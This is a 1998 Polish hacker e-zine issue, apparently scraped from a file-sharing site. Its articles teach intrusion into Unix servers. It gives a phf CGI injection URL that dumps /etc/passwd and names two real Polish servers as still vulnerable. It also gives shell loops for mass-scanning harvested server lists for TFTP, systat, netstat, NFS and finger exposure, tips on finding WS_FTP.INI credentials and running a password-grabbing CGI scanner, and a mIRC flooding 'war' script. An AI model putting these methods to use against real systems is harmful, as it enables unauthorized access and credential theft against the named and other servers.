hackers mag 3 artykuły CTSHG2C2LSIBXJ3HT77334MQGH72IQ4QEI5H3QY


0x01 graphic

| | ---- ---- | / |--- |---\ /---\ |\ /| /--\ /-----

| | | | | | | / | | | | | \ / | / \ |

|----| |----| | |\ |-- |---/ \---\ | \/ | |----| | --\

| | | | | | | \ | | \ | | | | | | |

| | | | ---- | \ |--- | \ \---/ | | | | \----/

=============================================================================

Numer:03 z czerwca 1998 http://www.kki.net.pl/hackers

=============================================================================

Spis tresci:

1.Spis tresci

2.Wstep

3.Hacker Start

4.Zdobywanie wielu kont.

5.Skrypt!

6.Unix - polecenia cz.2

7.Linki do ciekawych stron

8.Redakcja

-----------------------------------------------------------------------------

Wstep:

Cos jakos tak ten mag wychodzi co 2 miesiace, choc powinien co miesiac. Do

tego numeru dolacze program opisywany w poprzednim numerze - "Kaboom!" .

Cos sie z nasza strona www dzieje, moze nawet za pol roku bedzie mozna uznac

ja za skonczona :) . W tym numerze bedzie duzo o UNIX-ie.

Kontakt przez email: hackers@kki.net.pl

Richgyver

ps. Napiszcie czy wolicie wersje tekstowa czy html-owska wersje maga!

-----------------------------------------------------------------------------

"Hacker Start":

Opisze tutaj dosc znany sposob wyciagniecia pliku passwd z katalogu etc w

systemach UNIX przez przegladarke internetowa z serverow podlaczonych do

internetu. Znajdujemy jakis serwer (komputer podlaczony bezposrednio do

internetu) a nastepnie wpisujemy w pole adresu:

http://xxxx.xxxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

^^^^^^^^^^^^^

tu adres servera

W tedy w przegladarce pojawi nam sie caly plik passwd, gdzie sa zapisane

hasla wszystkich uzytkownikow danego systemu. Oczywiscie sa one zaszyfrowane.

Rozszyfrowac je mozna programikiem o nazwie "Cracker Jack".

Ta metoda dziala juz na bardzo niewielu serwerach unixowych. W polsce ta

metoda dziala na:

http://www.radio.opole.com.pl

http://www.perytnet.pl

Richgyver

-----------------------------------------------------------------------------

ZDOBYWANIE WIELU KONT:

czesc 1: Tworzenie listy serwerow i wstepne zbieranie informacji...

Zaczne od tego, ze pisze ten artykul tylko po to, aby inni uzytkownicy

wiedzieli, ze mozliwe jest latwe zdobycie ich konta UNIXowego.

=============================================================================

OK., jest to pierwsza czesc mojego artykulu na temat hackowania

kont UNIXowych, wiec chcialbym napisac co wogole bedzie mozna

tu znalezc. Wiec tak, zamierzam opisac metody zdobywania adresow

serwerow i wyszukiwania tych slabo zabezpieczonych, dalej metody

chodzenia wokol systemu, zdobywania informacji o jego slabych

punktach, ktore mozna wykorzystac do wlamania. Nastepnie kilka

metod dostania sie do takiego serwera. Czytanie pliku /etc/shadow

z poziomu "szarego" uzytkownika, zdobywanie dalszych kont po

wlamaniu sie na serwer ( konie trojanskie, poszukiwanie bledow

w konfiguracji, itp. ). Moze bedzie cos jeszcze

( jesli mnie natchnie, lub znajde cos ciekawego w sieci :)

============================================================================

To zaczynam:

Najlatwiejszym sposobem wlamania sie do systemu jest wyszukanie

sobie kilku najslabiej zabezpieczonych serwerow i testowanie

roznych metod wlasnie na nich. Jest to tez chyba najbezpieczniejsze,

gdyz zakladam, ze skoro serwer jest slabo zabezpieczony, to jest

rowniez slabo monitorowany, co daje nam rowniez wieksze bezpieczenstwo.

Jak wyszukac sobie takie serwery? Otoz jest to bardzo proste.

Podam tu dwie najprostsze chyba metody:

1. Uruchamiamy wyszukiwarke internetowa ( np. www.wow.pl ),

wybieramy interesujacy nas dzial serwerow ( polecam edukacja/

szkoly, uczelnie, organizacje studenckie i tym podobny

shit :) Gdy pojawi sie spis serwerow zapisujemy go na dysk.

Kiedys wszystkie dzialy WOWa byly na plytce WWW ( np.

"WWW" sierpien 1997, mozna wiec zrobic to off-line oszczedzajac

kase ). Dalej wycinamy adresy serwerow ( recznie lub przy

uzyciu jakiegos programiku np. UrlCut, ktory dolaczam [ jest

to wersja 0.01 napisana w 15 min., wiec posiada duzo bledow,

ale obiecuje je wkrotce poprawic ] ). Majac juz liste serwerow

( jeden pod drugim ) mozemy rozpoczac scanning...

2. Druga metoda to sciagniecie gotowej listy serwerow z:

ftp.rs.internic.net

( sa tam: com.zone.gz, edu.zone.gz, gov.zone.gz, org.zone.gz,

root.zone.gz i inne ). Polecam edu lub org, jako najslabiej

zabezpieczone. Odradzam natomiast "zabawe" z gov.zone.gz

( szczegolnie poczatkujacym hackerom ). Po zrzuceniu pliki

te nalezy rozpakowac ( $ gzip -d edu.zone.gz lub pod WIN95

WinZip 6.3 [ moze inne tez] ). Dalej znow trzeba recznie

odzielic adresy od reszty danych ( mozna uzyc programiku

getdomain napisanego w perlu [ uruchamiamy go:

$ perl getdomain.pl edu.zone edu>lista ,lub dla org

$ perl getdomain.pl org.zone org>lista i analogicznie inne ]).

W najblizszym czasie postaram sie napisac podobne narzedzie

pod DOSa.

3. Mozna tez wykorzystac liste serwerow, ktora dodaje do

artykulow jest ona uzyskana wlasnie z WOW i obrobiona

programikiem UrlCut.

Dobra mamy juz liste serwerow. Teraz nalezaloby oddzielic

ziarna od plew. Zaczynamy od wstepnego przejrzenia podstawowych

dziur...

W tej czesci podam jedynie jak zdobywac rozne dane,

w czesci nastepnej postaram sie przedstawic wam ich analize

i doczego moga nam sie przydac zdobyte informacje.

a) SENDMAIL:

Zacznijmy moze od sprawdzenia wersji sendmaila na serwerze.

$ telnet adres.serwera.ofiary 25

powinno pojawic sie cos takiego:

...adres.serwera.edu.pl Sendmail 8.6.12/8.6.12 ready at...

Aby zrobic to automatycznie mozna uzyc programu SMSCAN,

uruchamiajac go ze stworzona wczesniej lista serwerow

( najpierw kompilujemy i zamieniamy nazwe :)

$ gcc smscan.c

$ mv a.out SMSCAN

i uruchamiamy:

$ ./SMSCAN lista>plik.z.wersjami.sendmaili&

Trwa to dosc dlugo, wiec najlepiej robic to albo noca,

albo polaczyc sie z jakims serwerem udostepniajacym

konta UNIXowe zrzucic tam SMSCAN i liste serwerow do

sprawdzenia a po uruchomieniu ( zostawic proces w tle

& lub nohup ) i wylogowac sie. Wyniki

mozna obejrzec wtedy np. nastepnego dnia.

Spisujemy numery wersji Sendmail'i ( potem nam sie przydadza ).

b) TFTP ( Trivial File Transfer Protocol ).

Sprawdzamy, czy serwery maja zaistalowanego klienta tftp:

$ telnet adres.serwera.ofiary 69

Jesli sie polaczy - notujemy to sobie, jesli nie - szukamy dalej.

Dzis juz bardzo trudno znalezc serwer odpowiadajacy na

takie zawolanie. Najczesciej zobaczycie napis:

telnet: Unable to connect to remote host: Connection refused

Mozna tez napisac script, ktory bedzie to robil za nas.

W najprostszej formie wygladalby tak:

$ cat script.tftp

telnet www.adres1.edu.pl 69

telnet www.adres2.edu.pl 69

telnet www.adres3.edu.pl 69

Tak robilem na poczatku, gdy jeszcze nie umialem napisac

bardziej skomplikowanego, lecz uniwersalnego scriptu.

Teraz wyglada on w ten sposob:

$ cat script.tftp

#!/bin/sh

for serwer in `cat $1`

do

telnet $serwer 69

done

$ :)

Uruchamiamy:

$ ./script.tftp lista.serwerow>raport.tftp

Przegladajac 'raport.tftp' wyszukujemy z jakimi serwerami polaczenie

sie powiodlo. Notujemy to sobie.

c) SYSTAT i NETSTAT.

Wykonujemy te same czynnosci, co powyzej, lecz zamiast portu 69

odpowiadajacego za TFTP podajemy 11 (systat) a nastepnie

15 (netstat). Sprawdzamy czy otrzymujemy odpowiedz z serwera

( czy porty te sa aktywne ). Jesli tak:

$ telnet www.adres.serwera 11>raport.systat&

Powinienes otrzymac liste procesow na serwerze ( tak jakbys wydal komende

ps -auwwx ), nie majac nawet na nim konta.

$ telnet www.adres.serwera 15>raport.netstat&

Zwroci Ci liste aktywnych portow serwera.

d) NFS, czyli Network File System.

Jest to chyba najfajniejsza rzecz jaka wymyslono. Admini ciagle

maja problemy z konfiguracja pliku /etc/exports.

Tworzymy wiec podobny script, z tym, ze zamiast telnetu wpisujemy

" showmount -e ".

----- wytnij tu ------

#!/bin/sh

for serwer in `cat $1`

do

showmount -e $serwer

done

----- wytnij tu ------

Na wiekszosci systemow potrzeba do tego roota.

# script.mount lista.serwerow>raport.mount&

Jednak juz w Red Hat Linux 5.00 moze to zrobic kazdy uzytkownik

( a taki system jest wlasnie na dom.vr.pl, gdzie mozna sobie

zalozyc darmowe konto ).

% script.mount lista.serwerow>raport.mount& ;)

e) FINGER.

Jest to rowniez bardzo pozyteczne narzedzie. Szczegolnie w wydaniu:

$ finger -l @www.adres.serwera

Zwroci nam to dane na temat pracujacych w systemie uzytkownikow.

Przydatne jest to szczegolnie przy probie dostania sie do

systemu poprzez odgadniecie hasla.

Znow tworzymy script, aby miec te informacje uwiecznione ( do pozniejszej

analizy ).

f) WWWBOARD.

O wwwboard bedzie wlasciwie pozniej, ale warto jest sie zorientowac,

czy serwer udostepnia takie uslugi ;)

$ lynx

Teraz naciskamy liere "g" i wpisujemy adres serwera:

URL to open: http://www.adres.serwera/wwwboard/wwwboard.html

Jesli odnajdzie szukana strone, notujemy. Nie - szukamy dalej.

[ Na temat hackowania wwwboard'a napisze w kolejnych czesciach

artykulu ]

g) WS_FTP.

Bardzo trudno jest dzis znalezc plik WS_FTP.INI z aktualnym

wpisem, ale jesli Ci sie to uda to koniecznie zapisz to sobie.

Jak go znalezc?

Najlepiej polaczyc sie z serwerem za pomoca anonimowego ftp

i szukac :) Gdy znajdziemy, to:

ftp> get WS_FTP.INI

[ Szerzej na temat WS_FTP napisze w dalszych czesciach artykulu ]

h) Dziury w scriptach CGI-BIN w starszych HTTPD.

Pod katem tego typu dziur mozna przeszukiwac serwery wykorzystujac

program ( a raczej kilka scriptow ) XENOLITH i wczesniej

stworzona liste. Do artykulu zalaczam script z tego pakietu o

nazwie monk.sh

Uzycie:

$ ./monk.sh lista.serwerow

Podczas skanowania tworzy on pliki o nazwie powstalej z adresu

serwera, w ktorych zapisuje sciagniety plik z haslami

( pod warunkiem, ze go sciagnie, co dzis nie jest juz takie proste :(

W celu przeskanowania pojedynczego serwera korzystam ze swietnego

programiku o nazwie Vito. Dolacze go do nastepnego artykulu, w ktorym

dokladniej opisze te dziury.

=============================================================================

OK. tyle na dzisiaj. Wiecej w nastepnym numerze, w ktorym postaram

sie wytlumaczyc wam w jaki sposob interpretowac zdobyte informacje,

oraz jak z nich korzystac.

=============================================================================

ArktH

ps. Pozdrowienia dla: KeenU'a, Sir D, BoBo, 3stan'a i pozostalych.

" Nil mortalibus ardui (e)st... " - Horacy

mail: arkth@friko4.onet.pl

flames: /dev/null

-----------------------------------------------------------------------------

Skrypt!:

Jak to mawiał kiedyś pan Japa WITKA (kto nie rozumie to nie zrozumie).W

każdym bądź razie to znowu JA. Hmmm znowu kazali mi cos napisać ale nie

powiedzieli co. Uwazam ze każdy z was ma mIRC-a (internet realy chat) ale

jeśli nie to załączam go tutaj. Jego instalacja jest banalna wiec nie będę

jej opisywal. Może nie raz będąc na ircu usłyszeliście cos o skryptach czy

to wojennych obronnych czy może uniwersalnych. Właśnie to o nich chce

powiedzieć co nieco. Niektórych stron możecie ściągnąć jakiegoś scrypta np.

http://www.7thsphere.com/sphere/files/sphere.exe i jest on jednym z lepszych

scryptow wojennych. Jest on w pliku zip lub wersji instalacyjnej. Po

ściągnięciu rozpakujcie go do katalogu w którym macie zainstalowanego Mirca.

Po włączeniu może pojawić się kłopot z setupem. Wpiszcie co tam chcą a jeśli

będziecie mieli kłopocik to po prostu trzeba wcisnąć cancel. I właściwie to

wszystko jeśli chodzi o instalacje. Po włączeniu musicie od początku wpisać

swoje dane i kanał ircowy. Zaraz po połączeniu zobaczycie zmiany. Po

pierwsze pojawiły się dźwięki. Wszystko wyświetlane jest w oknach. W pasku

opcji pojawiła się nowa 7sphere. Jest tam wiele opcji m.in. można ustawić

sobie ochronę różnego rodzaju np. przed floodem. Możemy zapisywać logi by

potem sobie poczytać lub sprawdzić co kto mówił. Ważną opcją jest przejście

do War Menu. Mamy wtedy dostęp do kilku programów do banowania, floodowania

i różnych takich:):):):):)(r)Dużo opcji jest dostępnych dopiero gdy mamy opa

(operator kanału).

Lukas

-----------------------------------------------------------------------------

Unix - polecenia czesc II :

Zdobywanie informacji o innych użytkownikach:

-Sprawdź co użytkownik robi - w "nazwa_użytkownika"

-Sprawdź co użytkownik ostatnio robił - lastcomm "nazwa_uzytkownika"

-Sprawdź porę zalogowania się/wylogowania - last "nazwa_użytkownika"

-Wyświetlanie praw dostępu w katalogu macierzystym użytkownika

- ls -ld ~"nazwa użytkownika"

Prawa dostępu do plików i katalogów w UNIX:

-Sprawdź prawa dostępu do pliku - ls -l nazwa_pliku

-Sprawdź prawa dostępu do katalogu - ls -ld nazwa_pliku

-Sprawdź prawa dostępu w swoim katalogu macierzystym

- ls -ld ~"twoja_nazwa_użytkownika"

Prawa dostępu (lewa część wykazu) będą podane następująco:

-rxw-------- 2 aaron 512 Feb 17 08:14 nazwa_pliku

gdzie symbole mają następujące znaczenie:

d - katalog

rwx (pierwsze) - prawa dostępu dla użytkownika (Ciebie)

rwx (drugie) - prawa dostępu dla członków twojej grupy

rwx (trzecie) - prawa dostępu dla innych (pozostałych)

w każdej kategorii -użytkownik członkowie_grupy inni

Symbol oznacza:

R - zezwolenie na odczyt (kopiowanie, wyświetlanie, ściąganie)

W - zezwolenie na zapis (zmiana nazwy, modyfikowanie, kasowanie)

X - zezwolenie na uruchomienie pliku

- - brak danego zezwolenia

Prawa dostępu możesz zmienić poleceniem CHMOD. Trzeba w nim wskazać kategorię

(u- użytkownik, g- członkowie grupy, o- inni,) oraz które zezwolenie (rwx)

ma być włączone (+) lub wyłączone (-) Parametry mogą być kombinowane np.

Chmod o-rw nazwa_uzytkownika - wyłączy zezwolenie na zapis i na odczyt dla

innych

Chmod u+x nazwa_uzytkownika - włączy zezwolenie na uruchamianie dla

użytkownika

Lukas

-----------------------------------------------------------------------------

Linki do interesujacycg stron:

-strony zwiazane z h/p/c/v/a

-http://www.kki.net.pl/hackers

-http://www.inet.com.pl/rafal

-http://hack.netpol.pl

-http://kki.net.pl/glider

-http://www.kki.net.pl/~masher

Twoja strona tez moze znalezc sie w tym spisie. Musisz najpierw:

1. Umiescic ten "kawalek" kodu html na swojej stronie:

<-- Poczatek odnosnika do hackersmag -->

<-- Koniec odnosnika -->

2. Napisac do nas email (zadresowany do hackers@kki.net.pl) z informacja

o adresie twojej strony.

Jesli wszystko zrobiles poprawnie twoja strona zostanie umieszczona w naszym

spisie najciekawszych stron.

-----------------------------------------------------------------------------

W sklad redakcja tego maga wchodza:

-Richgyver (hackers@kki.net.pl)

-Lukas (chopin@friko.onet.pl)

-ArtktH (arkth@friko4.onet.pl)

Jesli chcial cos napisac do naszego maga (a nam to sie by spodobalo)

lub napisales juz jakis tekst to wyslij to na adres: hackers@kki.net.pl

ze swoimi danymi. Kazdy taki piszacy do naszego maga dostanie wynagrodzenie

(pieniadze).

Zawsze wszystkie numery poprzednie oraz najnowszy numer naszego magazynu

mozesz sciagnac ze strony: http://www.kki.net.pl/hackers

Mozesz do nas napisac list, nasz email: hackers@kki.net.pl

Wszystkie materialy i informacje zawarte sa tu jedynie w celach

*EDUKACYJNYCH* i nikt z redakcji nie ponosi *ZADNEJ* odpowiedzialnosci, za

zle wykorzystanie podanych tu informacji...

/Koniec pliku tekstowego./



Wyszukiwarka

Podobne podstrony:
hackers mag artykuł VVK7H5T77ZJ4C7C5DTYSZFZCW6B5COREEWGAJJA
hackers mag 4 artykuły HMHYQFQGEMGCXIJHMOGYDHKH2RGMLUIMKFOW5FY
hackers mag 5 artykuły GKENU6GECHM5O43J2B7AVI3CQSJW37RBVYUZ7SY
hackers mag 2 artykuł HVAYWRJIKB6SKZQQDG3ILL4B6GATL73GFL6AEMQ
dodatkowy artykul 2
ARTYKUL
laboratorium artykul 2010 01 28 Nieznany
Fizjologia snu Artykul
Praca mag Promocja a kształtowanie wyobraźni ekonomicznej (2)
energoefekt artykul transmisja danych GPRS NiS[1]
Komunikacja interpersonalna Artykul 4 id 243558
artykul profilaktyka cz2 id 695 Nieznany (2)
kryteria oceny podręczników artykuł
Artykul (2015 International Jou Nieznany
ARTYKUL Mieszanki niezwiazane na podbud
artykul bromy id 69542 (2)
archetypy w reklamie artykul ma Nieznany (2)
Medyczny artykuł naukowy Zasady dobrej praktyki publikacyjnej [J E Zejda]

więcej podobnych podstron